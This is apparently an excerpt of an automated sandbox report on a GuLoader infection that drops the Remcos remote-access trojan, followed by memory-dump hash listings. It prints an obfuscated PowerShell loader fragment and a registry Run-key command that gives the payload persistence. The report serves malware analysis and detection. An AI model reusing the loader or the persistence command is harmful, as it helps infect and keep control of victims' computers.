ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. 
DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. 
mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
                                                              Imagebase:0xc10000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1737463772.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1737667724.000000000AAA8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1718585876.0000000006142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:11:07:07
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:11:07:33
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0xc00000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.2618570494.00000000053D8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:11:07:49
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
                                                              Imagebase:0xc30000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:11:07:49
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:11:07:49
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
                                                              Imagebase:0x8d0000
                                                              File size:59'392 bytes
                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                                • Instruction ID: a7ab2019bdd9a58f19e8347c12767bd4f0a096fab6dc0520ab41676a56c09198
                                                                • Opcode Fuzzy Hash: ed9e20e323438f4de82cec82d0661d6b513c8661f56bef16163ad7f17a0bcd97
                                                                • Instruction Fuzzy Hash: 32F1D2B4B012149FE724DB68C954B6E7BB3EB84308F2084E9D509AF795DB31DD81CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q
                                                                • API String ID: 0-531570531
                                                                • Opcode ID: 8ec6a1f6716d35974ca7a4c5541db96679c72bfd23d7f843f1ce7437b9ae5df5
                                                                • Instruction ID: 4ac58d1f9dbe83ff3d128c9dbf49cb9d032bc2d00795104695c0672ad5b7f702
                                                                • Opcode Fuzzy Hash: 8ec6a1f6716d35974ca7a4c5541db96679c72bfd23d7f843f1ce7437b9ae5df5
                                                                • Instruction Fuzzy Hash: 3351AEF9B20203CFEB54BB39885466A7BE2EFC2314B5484E9E511CF2A6DB30C855C752
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q
                                                                • API String ID: 0-458585787
                                                                • Opcode ID: 62a91f538f94a2d352e52d0c443812cfc82fa37426300cea843a61f6f767c9ee
                                                                • Instruction ID: 6044f2bada30722851766e27527155be4fb89ee06224e99cd8e397e753a1664a
                                                                • Opcode Fuzzy Hash: 62a91f538f94a2d352e52d0c443812cfc82fa37426300cea843a61f6f767c9ee
                                                                • Instruction Fuzzy Hash: 7C118CF13043866BFB7426298C407637EA6DF91744F24C4BAA554DB2C5D679C445C361
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q
                                                                • API String ID: 0-458585787
                                                                • Opcode ID: 31dde5e7a856d546214e5adad2c52fa9e82c1f28851ba22ffd53a92408a94425
                                                                • Instruction ID: 99df5e47d288955aaa0e78564920b37134278765ffa2bdebd08f865473356249
                                                                • Opcode Fuzzy Hash: 31dde5e7a856d546214e5adad2c52fa9e82c1f28851ba22ffd53a92408a94425
                                                                • Instruction Fuzzy Hash: 352137FAA043559FDB64BF6884402A9BBF4FF45250B1980EADC08EB241E2319948C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q
                                                                • API String ID: 0-2033115326
                                                                • Opcode ID: b9fa0cbbdedc3d6fddf936a602b46a8c7684fb5714b535f2e59e01f535c20cd5
                                                                • Instruction ID: d6aeccc4e047f6dbc0190f138cf9549252aa5f01a7a4dc2d7847044f37550ec9
                                                                • Opcode Fuzzy Hash: b9fa0cbbdedc3d6fddf936a602b46a8c7684fb5714b535f2e59e01f535c20cd5
                                                                • Instruction Fuzzy Hash: DC7237B4A00214DFE764DB18C944B59BBB2EF85308F64C0E9D909AB352DB72ED85CF91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q
                                                                • API String ID: 0-2033115326
                                                                • Opcode ID: 709d56ace2f22acc90c6f5783e89d7e3ca3c32cd18d05084719c7a594912903a
                                                                • Instruction ID: cb8c1193db36725d752949b7e0959cd4d6cb658e5583e4e88d6d4ec241825e77
                                                                • Opcode Fuzzy Hash: 709d56ace2f22acc90c6f5783e89d7e3ca3c32cd18d05084719c7a594912903a
                                                                • Instruction Fuzzy Hash: DE2258B4A00214DFE764DF18C855B59BBB2EB85308F24C0E9D909AB352DB72ED85CF91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q
                                                                • API String ID: 0-2033115326
                                                                • Opcode ID: 7e542a3addceed3b3c0078a963ad8268190449c4f12c73faed84d785d7fa36fa
                                                                • Instruction ID: 6e6bd3299cad4c1da397e7a9d359fd251cd62dccb2c70423bca7be8c6bb3eb4e
                                                                • Opcode Fuzzy Hash: 7e542a3addceed3b3c0078a963ad8268190449c4f12c73faed84d785d7fa36fa
                                                                • Instruction Fuzzy Hash: D64125F4B24302DFEBA4AF24C540B6A77E3EF90205F9484E6D9049B255D736D981C792
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ad20d4bf2fafa02a0ebfe21ef148016ba2ad2a60b219eaf21fe75ccfecd321d
                                                                • Instruction ID: 97724f896387ae99cdd4ea5ba1731abf6c0131d39c6f347eef0a65d2c4e52a31
                                                                • Opcode Fuzzy Hash: 6ad20d4bf2fafa02a0ebfe21ef148016ba2ad2a60b219eaf21fe75ccfecd321d
                                                                • Instruction Fuzzy Hash: E6B1AEF4B00205AFE764EB68C545BAEBBA3EF89304F1080A8D415AF795CB76DC51CB91
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d6b5bedd3544a730401f2bea02bde171e448ae3abdafe691f659888659eb911
                                                                • Instruction ID: a4d0a85a362805b56af8ba1952bf4128d0db280bea37b1564709b06ff53ce46d
                                                                • Opcode Fuzzy Hash: 2d6b5bedd3544a730401f2bea02bde171e448ae3abdafe691f659888659eb911
                                                                • Instruction Fuzzy Hash: F3A1AEF4A00201EFE764EF68C545B9ABBB3EF89304F1480A9D405AF791CB75AC91CB91
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d27d544f7335753b18bb75748ed18a042255d62cc0c76968cf9c2dda0baba5b9
                                                                • Instruction ID: d93976c5199f4095a94de1d49ab41e7363d078ac404a482df50ca3515e570b2d
                                                                • Opcode Fuzzy Hash: d27d544f7335753b18bb75748ed18a042255d62cc0c76968cf9c2dda0baba5b9
                                                                • Instruction Fuzzy Hash: 6B4139F9A00202DFEB64EF24844176ABBB2EB80304F15C0E7C815EF245D735D891DBA1
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7bfc3cc41c3c87d251530561968fada6cd2779804bb782d0f5b136be16cf6189
                                                                • Instruction ID: b40da1ecfad182f66a01fe6e694346e5323ef74d4e9ae51e3fe131ce40031743
                                                                • Opcode Fuzzy Hash: 7bfc3cc41c3c87d251530561968fada6cd2779804bb782d0f5b136be16cf6189
                                                                • Instruction Fuzzy Hash: 0E31EAB9740214AFE704AB64C915BAF7E63DF84348F20C464E9116F799CF759C828BE1
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 305454665df059930496aee214dffc3d1a570bf85ca12c9a7fbc705b123ffc7d
                                                                • Instruction ID: 6511fc317c323ebd4830c0f998b2ee5e80df27edc3812a6a91a5d07189cda7f3
                                                                • Opcode Fuzzy Hash: 305454665df059930496aee214dffc3d1a570bf85ca12c9a7fbc705b123ffc7d
                                                                • Instruction Fuzzy Hash: 95217CF170031AABE7647A7A884073B7ADAEBC4756F24847BE509DB680DE75C944C360
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f5f9dae796d9f882361a520b11c01543bcb3228ec68a66f1140a1eda81800ed
                                                                • Instruction ID: fd1eb99f2b627f07609cd38f327411de1ca3d9d59e73ad18c39235602d863e67
                                                                • Opcode Fuzzy Hash: 3f5f9dae796d9f882361a520b11c01543bcb3228ec68a66f1140a1eda81800ed
                                                                • Instruction Fuzzy Hash: D621BEF270434ABBF764392988007B77FD6DF85791F2484A7E954DA2C1DA78C988C361
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb8f1ccbbefc8166804c7fade8a318b68ba105fbf46c24ef86be23d88d681a1c
                                                                • Instruction ID: 502ca25b847fc501007b11ded389278b5092769d8c0f82d8b0f68cc865e72320
                                                                • Opcode Fuzzy Hash: cb8f1ccbbefc8166804c7fade8a318b68ba105fbf46c24ef86be23d88d681a1c
                                                                • Instruction Fuzzy Hash: BE0147B630431B9BE7A47DAAD40027AB79ADFC1662F14C47FD549C6610D632C80DCB60
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a568b5d092f00caefcabdfa27bddeb2cb95542c1e3640fe5c93a829fd25f851
                                                                • Instruction ID: 7595f3b1a6cbb7386e92e45b694a1e2b16da5458a533f9cef8d6a1dbcc17d0fa
                                                                • Opcode Fuzzy Hash: 7a568b5d092f00caefcabdfa27bddeb2cb95542c1e3640fe5c93a829fd25f851
                                                                • Instruction Fuzzy Hash: 9DF06DB56042418FE752AB04C854B18BBB2EF82B05F19C0DAD0498F2A3C733DD43CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-2601542563
                                                                • Opcode ID: 5c89c6ccba2b3fd8e19542d43c8578afa545c119fd8de103c911c7d3389dc115
                                                                • Instruction ID: af31d9060bfc586c9fac36b5febd129cde01ec7fe68fd408d70add39ca50e796
                                                                • Opcode Fuzzy Hash: 5c89c6ccba2b3fd8e19542d43c8578afa545c119fd8de103c911c7d3389dc115
                                                                • Instruction Fuzzy Hash: 50A155F9714206DFEB646A2AC8147EABBE5FF81211F1480FAD405CB295DB35CD81C7A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-4243389563
                                                                • Opcode ID: 80f1b2f57c59a4f5cf932b4b8d0db591d166968e4918a017c806ea253fc33374
                                                                • Instruction ID: f35e89fce5f45b2c41729431c1ccb622c6f7543985eab67cf834e02f089ef8e6
                                                                • Opcode Fuzzy Hash: 80f1b2f57c59a4f5cf932b4b8d0db591d166968e4918a017c806ea253fc33374
                                                                • Instruction Fuzzy Hash: A5F146F5704387DFEB68AF69C84066ABBE6EF81211F1885FAD805CB255DB31C841C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$t~rq$$_q$$_q$$_q
                                                                • API String ID: 0-1303506249
                                                                • Opcode ID: 810faf6d4675a90f762693ae3f05da868a904f6c4aff28a1d9b8cdb59e1e410c
                                                                • Instruction ID: 6801775b71ea3789c31d11d8c351f37b5a0e4fc88f701c14dd4c0a922ac4b7f8
                                                                • Opcode Fuzzy Hash: 810faf6d4675a90f762693ae3f05da868a904f6c4aff28a1d9b8cdb59e1e410c
                                                                • Instruction Fuzzy Hash: 30C148F1B0120A9FDB64AF69C8406AABBE6FFC5210F2484BED515CB245DB31C906C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-574570645
                                                                • Opcode ID: 067750d4ebb52e31b72ebdfc46a0df8115b797fefaaa59089b58862dd7ea23ed
                                                                • Instruction ID: 48b67cdfe70fabb9716128badbf9574e8c296f0a15c09dfa0b650188a26af351
                                                                • Opcode Fuzzy Hash: 067750d4ebb52e31b72ebdfc46a0df8115b797fefaaa59089b58862dd7ea23ed
                                                                • Instruction Fuzzy Hash: A15128F1B60206EFEB68AF64C44476ABBA2FF85310F54C4EAD4158F295CB31D801CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-3731700880
                                                                • Opcode ID: 4856182225f133c950ca140d57dd532364fade82d47091582ebf44fbbe2643d6
                                                                • Instruction ID: 5707b24c54f1ae7116f573218baa336e9f1f99127d436f1c9214be7e46867bd3
                                                                • Opcode Fuzzy Hash: 4856182225f133c950ca140d57dd532364fade82d47091582ebf44fbbe2643d6
                                                                • Instruction Fuzzy Hash: 75F157F17042069FEB64AA69C8003BABBE6EFC5311F14C0BBD459DB254DB32E855CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$tP_q$tP_q$$_q$(eq$(eq$(eq
                                                                • API String ID: 0-37460510
                                                                • Opcode ID: 151e6e677e23aca9213136901915250c9404feeaddac5f1e8a3cefbbf306bc05
                                                                • Instruction ID: 47e94af98a6768dbca6a93b063f7eb18662e41eaf4b65598871105d1e33132dd
                                                                • Opcode Fuzzy Hash: 151e6e677e23aca9213136901915250c9404feeaddac5f1e8a3cefbbf306bc05
                                                                • Instruction Fuzzy Hash: B2618EF0B00216DBEBA4AE55C548B6AB7A6EB4C711F6984EBE9046F3D0C731DC41CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$TQdq$TQdq$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-2694711154
                                                                • Opcode ID: b32c2bd605cbaf9a5dd9d892ded143e86829f28b41ef52013957ff119dbf93c6
                                                                • Instruction ID: 7755a4bc1182006b8139a67ebe35168d70f80ebdd121845fdefe729a53f01e69
                                                                • Opcode Fuzzy Hash: b32c2bd605cbaf9a5dd9d892ded143e86829f28b41ef52013957ff119dbf93c6
                                                                • Instruction Fuzzy Hash: B951BFF070020ADBEBA8AE04C544BAA77B2FB49315F5885E7E8099B2D1D771DD80CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$TQdq$TQdq$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-2694711154
                                                                • Opcode ID: 292514974b51d8cf8949313ddf01906159aad1c223ec102b10558d320e67ff43
                                                                • Instruction ID: f7fb38bd864ded0c640a9c4a86f1105ef193262d25ae1504ded0d2d551c0bb4e
                                                                • Opcode Fuzzy Hash: 292514974b51d8cf8949313ddf01906159aad1c223ec102b10558d320e67ff43
                                                                • Instruction Fuzzy Hash: 95518FF070060ADBEBA8AE05C544BAA77B2FB49315F5885E7E8099B2D0D771DD80CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-155944776
                                                                • Opcode ID: ffd04d11511729a2dbe7d1b42d1d2581d0f211e34c6b47d6c031ba61f9cebeda
                                                                • Instruction ID: 53b4d131a5a16f515b31d2affdccdecca86bbca082b5cda212158a5c7f1334de
                                                                • Opcode Fuzzy Hash: ffd04d11511729a2dbe7d1b42d1d2581d0f211e34c6b47d6c031ba61f9cebeda
